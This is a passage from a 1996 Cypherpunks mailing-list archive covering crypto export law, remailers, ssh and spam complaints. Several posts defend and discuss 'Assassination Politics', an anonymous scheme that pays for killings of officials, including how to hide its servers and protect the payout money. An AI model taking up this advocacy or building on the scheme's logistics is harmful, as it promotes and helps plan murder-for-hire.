police respond to a fight 911 call at the wrong address). The law is not fair in this regard. Prosecution is always selective and all one needs is an administration decision (even by some mid-level idiot at justice) and suddenly crypto export could be a serious issue. > > b.
evidence that the "confession" can be backed up by other evidence > In the case of the export at hand, a passport record exists, and surely the notebook exists. Were I a prosecutor with a bug in my rectum, I would think I had something of a case. > c. common sense This has never had anything to do with prosecution. I wish it did. > Thus, if even former prosecutor Brian Davis, when he was a prosecutor, were > to have "confessed to a felony" (for example, saying a bad word on a forum > where minors might be present, under the CDA, and before it was put on > semi-hold), his colleagues would just have snickered, thinking him crazy. There was once a day where confessing to sexual harassment or smoking something fishy would have caused this response. Today it is grounds for immediate dismissal. > As to the felony status of taking PGP to Russia, I think it's not a felony. > The "personal use" exemption in the ITARs certainly makes taking PGP to > _Western_ Europe an OK thing. Whether Russia is still considered to be > worthy of an "exemption to the exemption," as it were, is unclear to me. Unfortunately these kinds of exceptions are easily evaded when push comes to shove. > Mostly, I think U.S. Customs doesn't care. If this is true, it is for two reasons. 1> Because no one has yet told them to care. 2> Because they find the regulation too difficult to enforce. Start admitting that you have engaged in the conduct and those two factors may quickly vanish. Am I being cautious? Of course. Once upon a time it was ok to admit that you left the country with tens of thousands in cash too. > --Tim May > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C.
May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li

From jimbell at pacifier.com Thu Sep 26 13:50:05 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 27 Sep 1996 04:50:05 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <199609261713.KAA02040@mail.pacifier.com>
At 10:49 AM 9/26/96 -0400, Brian Davis wrote: >On Wed, 25 Sep 1996, Jean-Francois Avon wrote: > >> On 25 Sep 96 at 5:59, Brian Davis wrote: >> >> > I disagree that that will be the response, but you should be willing >> > to allow one group of people to fight fire with fire. >> >> But generally, it has been found a much better solution to fight fire >> with water, and this is why I am not convinced of the ideological >> effectiveness of AP, although I don't doubt its operational >> effectiveness at all. > > >If by "operation effectiveness" you mean some people will be killed, I >agree. I also agree with the fire/water comment (maybe in more ways than >one!); my comment related to my belief that AP-supporters shouldn't >complain about especially draconian measures taken against them by >governments, given their modus operandi. I think you totally missed Jean-Francois' point: Turn your last statement around, and that's how _I_ look at the operation of governments: "Government supporters shouldn't complain about especially draconian measures taken against them by AP, given their modus operandi." I for one would welcome a debate on just such an issue.
Remember, to justify the status quo you need to defend not only the comparatively-free governments of a handful of western nations, but in fact each and every government on the face of the earth. Don't think you can just say, "This government is sorta okay," because what I am proposing fixes all the other governments on earth. You can't support the maintenance of an oppressive system most everywhere else, simply because (arguendo) they "sorta" got it right, here. (And I'd argue against that last claim!) Besides, I've long ago given up the idea that the leadership of the US will really, truly attempt to promote freedom around the world. No, they won't. They will continue to support the thugs. The problem they have with overthrowing the thugs is that "what goes around comes around," and they're well aware that they're gonna get kicked off their throne once the precedent is set with a few dozen foreign governments getting replaced. Jim Bell jimbell at pacifier.com From jf_avon at citenet.net Thu Sep 26 13:51:58 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 27 Sep 1996 04:51:58 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <9609261727.AA03280@cti02.citenet.net> On 26 Sep 96 at 10:49, Brian Davis wrote: > If by "operation effectiveness" you mean some people will be killed, > I agree. I also agree with the fire/water comment (maybe in more > ways than one!); my comment related to my belief that AP-supporters > shouldn't complain about especially draconian measures taken against > them by governments, given their modus operandi. I don't think that any of them will complain because they understand the nature of it. I think that Jim Bell (forgive me Jim...:) view that there will be only limited retaliation from government is not guaranteed at all. As I said somewhere previously, the whole thing will depend on how the authorities view AP as (non-) attackable. 
Here is the post I wrote earlier: ------- earlier post ------- jim bell recently wrote: > Local police action against an AP organization would, of course, be > deterred by the prospect of naming anybody who would go after it, > and soliciting donations against them. I don't agree here. It would all be a matter of timing, unless the number of AP servers would be sprouting out faster than police forces would be able to destroy them. You have to realize that if the money is seized, nobody will be willing to make a hit since the odds of being paid are not too good. Just play the game "Command and Conquer" for a while and you'll see. Money is fuel. Don't run off of it! For that reason, I think that any AP server, *at the introduction of the concept* would have to be a covert operation. Servers could come out in public light when their number be large enough to warrant a strike on anybody trying to eliminate them. Same for the publication of the name of the individuals operating the server. To me, this seems obvious. Comments? To go on along that line, I had the idea that a specific piece of software, a bit like Private Idaho, that would chain remailers but that would be specifically designed to handle predictions, would have to be designed. (Pardon my ignorance of the net here) The server need not to be a unique address. Actually, the prediction and any accompanying documents could be split a la Secure Split, and sent to N different servers, M (

--- begin forwarded text MIME-Version: 1.0 Date: Thu, 26 Sep 1996 00:13:30 -0400 Reply-To: Law & Policy of Computer Communications Sender: Law & Policy of Computer Communications From: Alan Lewine Organization: Representing Myself Subject: Call for Papers: The Economics of Digital Information and Intellectual Property To: CYBERIA-L at LISTSERV.AOL.COM John F.
Kennedy School of Government Center for Science and International Affairs and Center for Business and Government Harvard Law School Institute for Information Technology Law and Policy Harvard University Library Council on Library Resources Coalition for Networked Information The Economics of Digital Information and Intellectual Property Cambridge, Massachusetts, USA January 23-25, 1997 First Announcement and Call for Papers Harvard University is hosting this symposium to broaden and deepen understanding of emerging economic and business models for global publishing and information access and the attendant transformation of international information markets, institutions, and businesses. The goal is to provide managers in public, private, and nonprofit sectors with a practical framework for developing program strategies and assessing the efficiency and competitiveness of new information markets and institutions. It will address questions such as: --What will be the principal pricing models for information in an advanced global Internet? -- How will pricing models be affected by different technological factors and market environments? -- What will be the relationships between classic production costs, transaction costs, and the economic value of intellectual property? -- How will different pricing practices at lower layers affect the pricing of information? -- What are likely long-term trends and scenarios for different pricing models? What will be the effect of bundling or unbundling of information services? -- How will changing cost structures change the allocation of rights between authors and publishers and other intermediaries? -- How will markets for complementary products and services affect the pricing and use of information? -- What are the policy implications of different pricing models? -- How do these reflect policy values associated with different kinds of information? 
Background: The rapid growth of the Internet and the World Wide Web is transforming the way information is accessed and used in business, education, and the home. New models for distributing, sharing, linking, and enhancing information are appearing, often embodied in software or infrastructure. No change is more dramatic than the shift to user-initiated retrieval for text-based information formerly distributed in the form of physical objects by publisher-initiated manufacturing and delivery. A similar shift may be underway for sound and video. However, the considerable differences in bandwidth and storage requirements between text, images, sound, and video may dictate different cost and pricing models in the near and mid-term. As production and distribution costs decline, transaction costs and the value of intellectual property may assume greater prominence. On the other hand, standards and software may work to substantially reduce transaction costs over the long run. With barriers to entry reduced by technology, information markets may become extremely competitive, reducing margins and possibly lowering the economic value of many forms of intellectual property. The Internet and the World Wide Web are characterized by explosion of information along with an explosion of new tools for navigating information. Competition for attention intensifies as companies extend their marketing, sales, and support functions into the Internet. Useful or entertaining information may have greater value in attracting customer attention in an increasingly competitive marketplace for information. Accordingly, it has been argued that information will be valued less as intellectual property and more in terms of the access it provides to other markets and the value it adds to relationships. As a practical matter, copyright may be overshadowed by the growing use of contracts as a means of both securing value and defining expectations in continuing relationships.
Positions in simple distribution chains are likely to erode as a result of disintermediation and intense competition. In particular, reduced production costs and the desire to avoid residual transaction costs may force vendors away from complex pricing models. For example, usage-based pricing may give way to subscription pricing. Such dynamics may lead to new institutional arrangements for managing life-cycle costs of information, especially in small markets where users are also producers. Similarly, as production costs decrease, the costs of information may be assimilated by the underlying infrastructure or assumed by users. This trend may be seen in the pricing of online services and in the massive volunteering of content on the World Wide Web. The Web, including software and servers, enables editorial and navigation functions traditionally performed by publishers and libraries to be performed in increased measure by individual authors and end users. Cost analysis in this environment may hinge on identification and evaluation of critical bottlenecks -- with the understanding that many technological limitations may be short-lived. Congestion may lead to new methods of supplementing point-to-point transmissions, such as caching, mirroring, and satellite broadcast. These new mechanisms may raise intellectual property and interconnection questions that may be addressed both as business and policy issues. Congestion may also hasten the implementation of type of service priority at either the network or server levels. Negotiation over quality and scope of service may become extremely complex, and vendors may be tempted to price to as many dimensions of value as possible. However, simple pricing models may have surprisingly strong appeal, as they have had in the analog environment. Sequential distribution windows for motion pictures illustrate the potential for simple price differentiation in a technologically complex environment. 
Price differentiation is now playing an increasingly important role in the marketing of software and databases. In fact, there may be public policy arguments for price differentiation, not only for reasons of efficiency but to enable some level of access for those who cannot afford access under standard terms, just as public libraries have offered access for those who could not afford to buy. ***** The Information Infrastructure Project emphasizes communication and sharing of insight among scholars and practitioners with different skills and backgrounds. Papers should be written in a clear, non-technical manner (technical appendices may be permitted) for a mixed, interdisciplinary audience that will include publishers, librarians, economists, lawyers, and policymakers. Prospective authors should submit short abstracts for review and comment as soon as possible. Extended abstracts or outlines should be submitted by October 15, 1996, to ensure consideration for the program. Acceptances of abstracts and outlines are conditional pending receipt of a satisfactory draft by December 15, 1996. Papers and supplementary material will be published as a volume in the Project's series with the MIT Press. Copyright assignment is not required, and parallel publication of individual papers in journals is encouraged. Please send paper proposals and requests for subsequent announcements to: iip at harvard.edu Or send mail to: Tim Leshan Information Infrastructure Project John F. Kennedy School of Government 79 John F. Kennedy St. Cambridge, MA 02138 617-496-1389 Fax: 617-495-5776 leshan at ksgrsch.harvard.edu -- Alan Lewine http://www.dcez.com/~alewine/ "[I]n sex as in other areas of life, beware governmental regulation." --Richard Posner, "Sex and Reason" (1992) --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender."
-- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From stewarts at ix.netcom.com Thu Sep 26 15:41:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 27 Sep 1996 06:41:26 +0800 Subject: LACC: Encryption and Japan Message-ID: <199609261922.MAA10619@dfw-ix1.ix.netcom.com> At 06:46 AM 9/25/96 +0100, T Bruce Tober wrote: >A few months ago I read an article concerning one of the encryption >gurus (other than PZ) setting up a company in Japan to create a new >encryption program as good as or better than PGP which since it was >developed in Japan, wouldn't be subject to ITAR. Jim Bidzos of RSA did a contractual deal with NTT, who have produced a chip with RSA and Triple-DES implemented on it. I'm not sure the details of the deal, but essentially it's a license to use the patented RSA technology. It's not that it's better or worse than PGP; it's hardware implementations of some of the building blocks PGP uses. The real win of PGP was taking the pieces (RSA public key key-distribution and signatures, hashing, and symmetric crypto (DES,Bass-O-Matic,IDEA)), putting them together into one relatively usable package, and distributing it. The Web Of Trust that you build out of the RSA signatures is also a win, since it lets you build non-hierarchical key distribution, which is especially valuable for non-government-approved lefties :-) as well as letting you build hierarchical military-style approval if you want. But that's all applications of the core technologies - NTT is providing the core pieces that you can build that sort of thing out of. The NTT deal means that non-US manufacturers can build crypto-phones, crypto-faxes, crypto-wide-area-network-muxes, etc., without annoying US local ordinances interfering. If they use it widely, and a flood of such products hit the US, ITAR becomes effectively dead, which may help it become really dead. 
And if they don't, you can at least get somebody in Japan to build a crypto-virtual-private-WAN router so your company's internal international email and phone network will be untappable. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From webwarrior at infowar.com Thu Sep 26 15:59:36 1996 From: webwarrior at infowar.com (webwarrior at infowar.com) Date: Fri, 27 Sep 1996 06:59:36 +0800 Subject: Apology Message-ID: <14383601200780@infowar.com> OOPS! OUCH!!! CRASH!!! Yesterday our ListServ underwent emergency surgery and our Web Warriors say all vital signs are stabilized. A complete recovery is assured! We apologize for the inconvenience. Thank you for your understanding. Winn Schwartau and the folks at Infowar.Com Betty G.O'Hearn Information Warfare and InfoSecurity Assistant to Mr. Winn Schwartau http://www.infowar.com betty at infowar.com 280 126th Ave. E.#110 Treasure Island, FL 33706 813-367-7277 Voice 813-363-7277 FAX From deviant at pooh-corner.com Thu Sep 26 16:01:34 1996 From: deviant at pooh-corner.com (The Deviant) Date: Fri, 27 Sep 1996 07:01:34 +0800 Subject: An idle thought on CBC and block lengths In-Reply-To: <960925181213_529562658@emout15.mail.aol.com> Message-ID: On Wed, 25 Sep 1996 PhneCards at aol.com wrote: > Date: Wed, 25 Sep 1996 18:12:14 -0400 > From: PhneCards at aol.com > To: osborne at gateway.grumman.com, cypherpunks at toad.com > Subject: Re: An idle thought on CBC and block lengths > > Did you know this company is using your email address as part of > an unlawful email bomb? > > I would advise you to write to them at cypherpunks at toad.com > and owner-cypherpunks at toad.com and advise them to stop > using your email address for this type of activity. > > It is illegal to use a invalid return email address. If this continues, I > will > be forced to prosecute the return email address - which they are > making to look like you. Is it? 
I believe that if you look closely, you will discover that all the laws which would have made lying illegal on the 'Net have now been repealed by more Federal judges than I can count on 1 hand... > > Below is the letter that I received in my email box > ================================================= > > In a message dated 96-09-25 15:52:17 EDT, you write: > > >Subj: An idle thought on CBC and block lengths > >Date: 96-09-25 15:52:17 EDT > >From: osborne at gateway.grumman.com (Rick Osborne) > >Sender: owner-cypherpunks at toad.com > >To: cypherpunks at toad.com > > > >So I was sitting bored at home and thinking to myself: CBC is cool. > >Without the key, you're screwed because a single bit error propagates > >throughout the entire message. But then I was thinking, yeah, but you can > >still eventually get the ONE key. So I began to wonder what the difference > >in security is between encrypting an entire M with just one K in CBC, or > >encrypting M with permutations of K over specific block lengths. > > > >On the one hand you've got just one key, which makes it that much harder to > >find in the keyspace. On the other hand, If evil interloper Eve gets her > >hands on it, she has to find all of the keys to get all of M. (Assuming she > >is using brute force and can't necessarily find the master K to permute > >into the subkeys.) > > > >The downsides are of course that on the one side you've got just one key, > >and once you get it, you get M. But on the other hand, you can get any one > >part of the message with less difficulty because of the higher number of > >keys. And, of course, if your master K is easy to brute force, then it's > >actually worse than the first option. > > > >Does anyone have opinions / knowledge of which is better? > > > > > >____________________________________________________________ > >Rick Osborne osborne at gateway.grumman.com > >"The universe doesn't give you any points for doing things that are easy."
> > > > > > > >----------------------- Headers -------------------------------- > >From cypherpunks-errors at toad.com Wed Sep 25 15:51:46 1996 > >Return-Path: cypherpunks-errors at toad.com > >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by > >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA04207 for > >; Wed, 25 Sep 1996 15:51:43 -0400 > >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > > id AA27411; Wed, 25 Sep 1996 13:47:22 -0600 > >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA16059 > for > >cypherpunks-outgoing; Wed, 25 Sep 1996 05:57:39 -0700 (PDT) > >Received: from gateway.grumman.com (gateway.grumman.com [192.86.71.8]) by > >toad.com (8.7.5/8.7.3) with SMTP id FAA16054 for ; > Wed, > >25 Sep 1996 05:57:32 -0700 (PDT) > >Message-Id: <3.0b19.32.19960925085644.0068cb90 at gateway.grumman.com> > >X-Sender: osborne at gateway.grumman.com > >X-Mailer: Windows Eudora Pro Version 3.0b19 (32) > >Date: Wed, 25 Sep 1996 08:56:45 -0400 > >To: cypherpunks at toad.com > >From: Rick Osborne > >Subject: An idle thought on CBC and block lengths > >Mime-Version: 1.0 > >Content-Type: text/plain; charset="us-ascii" > >Sender: owner-cypherpunks at toad.com > >Precedence: bulk > > > --Deviant A casual stroll through a lunatic asylum shows that faith does not prove anything. -- Friedrich Nietzsche From iang at cs.berkeley.edu Thu Sep 26 16:05:07 1996 From: iang at cs.berkeley.edu (Ian Goldberg) Date: Fri, 27 Sep 1996 07:05:07 +0800 Subject: Where to write crypto? In-Reply-To: Message-ID: <52env6$5ij@abraham.cs.berkeley.edu> -----BEGIN PGP SIGNED MESSAGE----- In article , Timothy C. May wrote: >At 2:05 PM 9/25/96, s1113645 at tesla.cc.uottawa.ca wrote: > >>Why go so far, when you can export crypto from Anguila or Canada. The > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >Are you _sure_ about what you say about Canada? 
After all, in nearly all >defense- and crypto-related matters, they are essentially the 51st State. >In fact, Canada is one of the places crypto may be exported _to_ from the >U.S. without any license. So, export strong crypto into Canada and then >invoke the "you can export crypto from...Canada" clause? > >I don't think so. As far as I'm aware, the rule for Canada is this: If it came from the US, it can only be exported back to the US. If it did not come from the US, it can be exported to any "non-evil" country ("evil" countries are ones like Libya). Then there are rules for what "came from" means, which are less clear. I've also heard "substantially modified": if software comes from the US into Canada, and is "substantially modified" in Canada, it may be exported. - Ian "having a vested interest in this topic..." From snow at smoke.suba.com Thu Sep 26 16:10:55 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 07:10:55 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609221810.TAA00172@server.test.net> Message-ID: <199609261906.OAA00239@smoke.suba.com> Mr. Beck said: > Been reading the AP thread, and thought I'd donate some of my views. > the Internet. You'd just cause the government to panic, and this > would have negative effects, it would take ages for them to calm down, > and the laws they'd pass in the mean time would mean a near certainty > of mandatory GAK as a condition to switching the Internet back on. > (Before someone takes me to task for the impossibility of switching > the Internet off, it all depends on the level of government panic.
> More specifically perhaps they would disconnect key backbones, and > ISPs briefly while they rushed into effect a few presidential decrees > outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets, > etc.) This would be cutting their own throats. There is SO much commercial and government traffic going across "The Net" that many businesses would scream bloody murder, and the government would have MASSIVE trouble with its agenda. > Libertarian governments, if they come, I think will be more easily, > and more likely achieved via non-violent means. I think it will be a > much more gradual process, and that government power will just be > gradually eroded as international businesses gain power, and borders > become more open, trade more free, as travel becomes cheaper, and > moving to another country becomes less of a hassle. Telecommuting, A very nice pipe dream. You sir have entirely too much faith in humanity. > Governments are currently flailing around trying to prolong the > inevitable. The fall out from this is beginning to annoy some people. > If it annoys enough people soon enough that they vote in a Libertarian > candidate for president in the next 20 years, crypto anarchy, and > libertarian governments could be reached more quickly. I'm not sure > it will ever get that far though, because the more votes the > libertarians get over the following years, the closer we get to > libertarian anyway, because the government has to start adopting their > policies to get the votes back. (Much like the green movement, which > once it started getting significant votes, and media attention, was > pandered to by politicians of all parties. They're all green now:-) They are TALKING green, but their actions aren't. This shows that the "libertarianization" of the ruling party would be in talk only. Unfortunately people vote THEIR pockets, regardless of why their pockets are the way they are. They vote their fears as well.
They will almost always vote for politicos who claim "anti-crime" (more like "more-prisons") and "anti-drug" (read "more inner city youth imprisoned"), and soon "anti-crypto" (which will be based on 4-horsemen hysteria). People, being for the most part stupid and short sighted, will vote away their rights, just as they have done for the last 200 years. No, I am not the LEAST BIT fatalist about this. I am trying to fight it with the limited resources I have, but... Petro, Christopher C. petro at suba.com snow at smoke.suba.com From comments at tv1.com Thu Sep 26 16:27:30 1996 From: comments at tv1.com (TV1) Date: Fri, 27 Sep 1996 07:27:30 +0800 Subject: A Special Invitation to TV1 Users: Message-ID: <199609262026.QAA14139@spirit.hks.net> -----BEGIN PGP SIGNED MESSAGE----- The best things in life are still free-and some of them get even better! Once upon a time, you registered to use TV1, the only personalizable TV listings site on the Internet. If you've been back to the site during the past week, you would have noticed gargantuan, earth-shattering additions to our humble old listings Web site. TV1 has been incorporated into The GIST, a full service home entertainment guide providing in-depth coverage of what's worth watching on TV and the Internet, as well as original features on everything from today's hottest television shows (with audio clips of stars) to reviews of the latest home entertainment hardware. If you've been to TV1/TheGIST lately, we hope you've been enjoying our service, and hope that you don't mind the fact that our graphic improvements now require at least a Netscape 2.0 or Explorer 3.0 browser. Stick with us, and you'll be seeing even more great enhancements during the next month. If you're one of those deprived Web surfers who hasn't seen the site in a few weeks, c'mon back--and see what you've been missing. Our new URL is www.theGist.com or you can still reach us at www.TV1.com. Thanks.
We look forward to helping you with your home entertainment choices tonight, and every night. Your wannabee hosts, - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] From jimbell at pacifier.com Thu Sep 26 16:32:11 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 27 Sep 1996 07:32:11 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <199609262012.NAA14242@mail.pacifier.com> At 01:27 PM 9/26/96 -0500, Jean-Francois Avon wrote: >On 26 Sep 96 at 10:49, Brian Davis wrote: > >> If by "operation effectiveness" you mean some people will be killed, >> I agree. I also agree with the fire/water comment (maybe in more >> ways than one!); my comment related to my belief that AP-supporters >> shouldn't complain about especially draconian measures taken against >> them by governments, given their modus operandi. > >I don't think that any of them will complain because they understand >the nature of it. I think that Jim Bell (forgive me Jim...:) view >that there will be only limited retaliation from government is not >guaranteed at all. As I said somewhere previously, the whole thing >will depend on how the authorities view AP as (non-) attackable. > >Here is the post I wrote earlier: > >------- earlier post ------- > >jim bell recently wrote: > >> Local police action against an AP organization would, of course, be >> deterred by the prospect of naming anybody who would go after it, >> and soliciting donations against them. > >I don't agree here. It would all be a matter of timing, unless the >number of AP servers would be sprouting out faster than police forces >would be able to destroy them.
You have to realize that if the money >is seized, nobody will be willing to make a hit since the odds of >being paid are not too good. Just play the game "Command and Conquer" >for a while and you'll see. Money is fuel. Don't run off of it! Uh, okay, I didn't mean to suggest that attacks would be entirely eliminated. (The term "deterred" really needed to be quantified there, even for a native English speaker.) But my main point was that (as evidenced by Brian Davis' unwillingness to acknowledge that the people who run the system will engage in illegality to stop AP) there is a certain hesitancy on the part of the "ruling class" to abandon at least the facade of legality that they often promote. > Jim Bell jimbell at pacifier.com From jkroeger at squirrel.owl.de Thu Sep 26 16:45:45 1996 From: jkroeger at squirrel.owl.de (Johannes Kroeger) Date: Fri, 27 Sep 1996 07:45:45 +0800 Subject: New alias server weasel.owl.de Message-ID: <19960926192626.18167.qmail@squirrel.owl.de> -----BEGIN PGP SIGNED MESSAGE----- I'm running the Squirrel Remailer for some weeks now and finally managed to install a "newnym" style alias server (like nym.alias.net) with the hostname weasel.owl.de.
Here is the PGP key: Type Bits/KeyID Date User ID pub 2047/B77F2491 1996/09/07 / The following lines should be added to Raph's remailer list: $remailer{'weasel'} = ' newnym pgp'; (weasel squirrel) Weasel.owl.de has MX records, but no IP address. You can finger addresses at squirrel.owl.de when it is connected to the Internet. My connection for email is via a UUCP link that is polled every 90 minutes, so do not expect quick turnaround of remailed messages. Please read the help file before using the remailer. You can get it by sending mail to . Reports of problems, bugs, abuse etc. should be sent to . C'punks, please mail questions and comments directly to me, as I'm not subscribed to the cypherpunks list.
- -- Johannes Kroeger Send me mail with subject "send pgp-key" to get my PGP key From Lsurfer at cris.com Thu Sep 26 16:48:19 1996 From: Lsurfer at cris.com (Randy Bradakis) Date: Fri, 27 Sep 1996 07:48:19 +0800 Subject: Stop Spammers Today! In-Reply-To: <960925085324_292805914@emout19.mail.aol.com> Message-ID: The former human known as "PhneCards at aol.com" wrote: {Dear cypherpunks; Hey, it knows who we are! {In the last few days I have received numerous email coming from you but with {fake return addresses from messages posted on newsgroups. I must have been {targeted because I am a bulk emailer. Letting you know now that I am a {legitimate bulk emailer compiling my list with the permission of each account {holder. Er, does it mean that someone subscribed it to the list? {If this barrage of email does not cease immediately, I will be forced to take {legal and maybe not so legal actions to defend myself. This from a 'bulk emailer'? 'scure me while I snort. :snort: Against whom, exactly, would you take legal action against? Hey, PhneCards, perhaps someone that was on your email list that wasn't exactly pleased with your assumptions of 'permission' subscribed you? Don't get any ideas about it having been me, or even someone actually on the list, as we see enough of this garbage as it is, and would have most probably subscribed you to a coredump or clueless list. {If you would like to discuss this further, please call me at 407-438-8892.
How about 'unsubscribe cypherpunks' in the message body of an email to majordomo at toad.com, instead? -- no sig too small From stewarts at ix.netcom.com Thu Sep 26 17:33:16 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 27 Sep 1996 08:33:16 +0800 Subject: Medical Data Message-ID: <199609262144.OAA19955@dfw-ix1.ix.netcom.com> At 09:28 AM 9/25/96 -0500, Phil Fraering wrote: >Of course, one area where the doctor will continue to hold a patient's >records, instead of the patient, due to the nature of the current system: > >Prescription medication. >Of course, with the really big problems with this stuff, drug >interactions, there's still no system for a doctor to find out what you're >on thanks to another doctor. Which is why it's very important to always >use the same pharmacist. Pharmacists in the US use a nationwide system that keeps track of who's using what. Issues in a system like this include insurance-paid pharmaceutical plans and also tracking politically-questionable pharmaceutical purchasers. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From unicorn at schloss.li Thu Sep 26 17:37:02 1996 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 27 Sep 1996 08:37:02 +0800 Subject: ssh - How widely used? Message-ID: Does anyone know if there are MS-Dos or Mac versions of the ssh client? How much is ssh used? I've not seen much discussion of it but poking around an ISP yielded this:

Ssh (Secure Shell) a program for logging into a remote machine and for executing commands in a remote machine. It is intended to replace rlogin and rsh, and provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel.

and

Usage: ssh [options] host [command]
Options:
  -l user     Log in using this user name.
  -n          Redirect input from /dev/null.
  -a          Disable authentication agent forwarding.
  -x          Disable X11 connection forwarding.
  -i file     Identity for RSA authentication (default: ~/.ssh/identity).
  -t          Tty; allocate a tty even if command is given.
  -v          Verbose; display verbose debugging messages.
  -q          Quiet; don't display any warning messages.
  -f          Fork into background after authentication.
  -e char     Set escape character; ``none'' = disable (default: ~).
  -c cipher   Select encryption algorithm: ``idea'' (default, secure), ``des'', ``3des'', ``tss'', ``arcfour'' (fast, suitable for bulk transfers), ``none'' (no encryption - for debugging only).
  -p port     Connect to this port. Server must be on the same port.
  -L listen-port:host:port   Forward local port to remote address
  -R listen-port:host:port   Forward remote port to local address
              These cause ssh to listen for connections on a port, and forward them to the other side by connecting to host:port.
  -C          Enable compression.
  -o 'option' Process the option as if it was read from a configuration file.

Looks like a nice little implementation. Comments anyone? -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From tcmay at got.net Thu Sep 26 17:39:05 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 08:39:05 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: At 1:37 PM -0400 9/26/96, Black Unicorn wrote: >> >> b. evidence that the "confession" can be backed up by other evidence >> > >In the case of the export at hand, a passport record exists, and surely >the notebook exists. Were I a prosecutor with a bug in my rectum, I would >think I had something of a case. What evidence of any sort do they have that any particular notebook computer was involved in the trip offshore? Seems to me this is a rather major defect in the evidence chain. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rah at shipwright.com Thu Sep 26 17:42:47 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 27 Sep 1996 08:42:47 +0800 Subject: Kid gets suspended for bomb info Message-ID: I'm sitting here, listening to National People's Radio, and they have this bit about a local kid who showed up in school today with 40 pages of bomb making info, "gotten off of the internet". He was "caught" when he showed his haul to his buddies. Much gnashing of teeth and flying of fur ensued, and the kid was sent home. More fun with numbers. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From bdavis at thepoint.net Thu Sep 26 17:44:33 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 27 Sep 1996 08:44:33 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <199609262012.NAA14242@mail.pacifier.com> Message-ID: On Thu, 26 Sep 1996, jim bell wrote: > At 01:27 PM 9/26/96 -0500, Jean-Francois Avon wrote: > >On 26 Sep 96 at 10:49, Brian Davis wrote: > > > >> If by "operation effectiveness" you mean some people will be killed, > >> I agree. I also agree with the fire/water comment (maybe in more > >> ways than one!); my comment related to my belief that AP-supporters > >> shouldn't complain about especially draconian measures taken against > >> them by governments, given their modus operandi. > > > >I don't think that any of them will complain because they understand > >the nature of it. 
I think that Jim Bell (forgive me Jim...:) view > >that there will be only limited retaliation from government is not > >guaranteed at all. As I said somewhere previously, the whole thing > >will depend on how the authorities view AP as (non-) attackable. > > > >Here is the post I wrote earlier: > > > >------- earlier post ------- > > > >jim bell recently wrote: > > > >> Local police action against an AP organization would, of course, be > >> deterred by the prospect of naming anybody who would go after it, > >> and soliciting donations against them. > > > >I don't agree here. It would all be a matter of timing, unless the > >number of AP servers would be sprouting out faster than police forces > >would be able to destroy them. You have to realize that if the money > >is seized, nobody will be willing to make a hit since the odds of > >being paid are not too good. Just play the game "Command and Conquer" > >for a while and you'll see. Money is fuel. Don't run off of it! > > Uh, okay, I didn't mean to suggest that attacks would be entirely > eliminated. (The term "deterred" really needed to be quantified there, even > for a native English speaker.) > > But my main point was that (as evidenced by Brian Davis' unwillingness to > acknowledge that the people who run the system will engage in illegality to > stop AP) there is a certain hesitancy on the part of the "ruling class" to > abandon at least the facade of legality that they often promote. You have misinterpreted me or I was unclear. I don't doubt that, at some point, the group of people who generally follow the rule of written law might skip over some of the more restrictive parts of that law to combat incessant violence. That is what I meant by "especially draconian measures"; I know you agree that such a response is logical and proper under the circumstances.
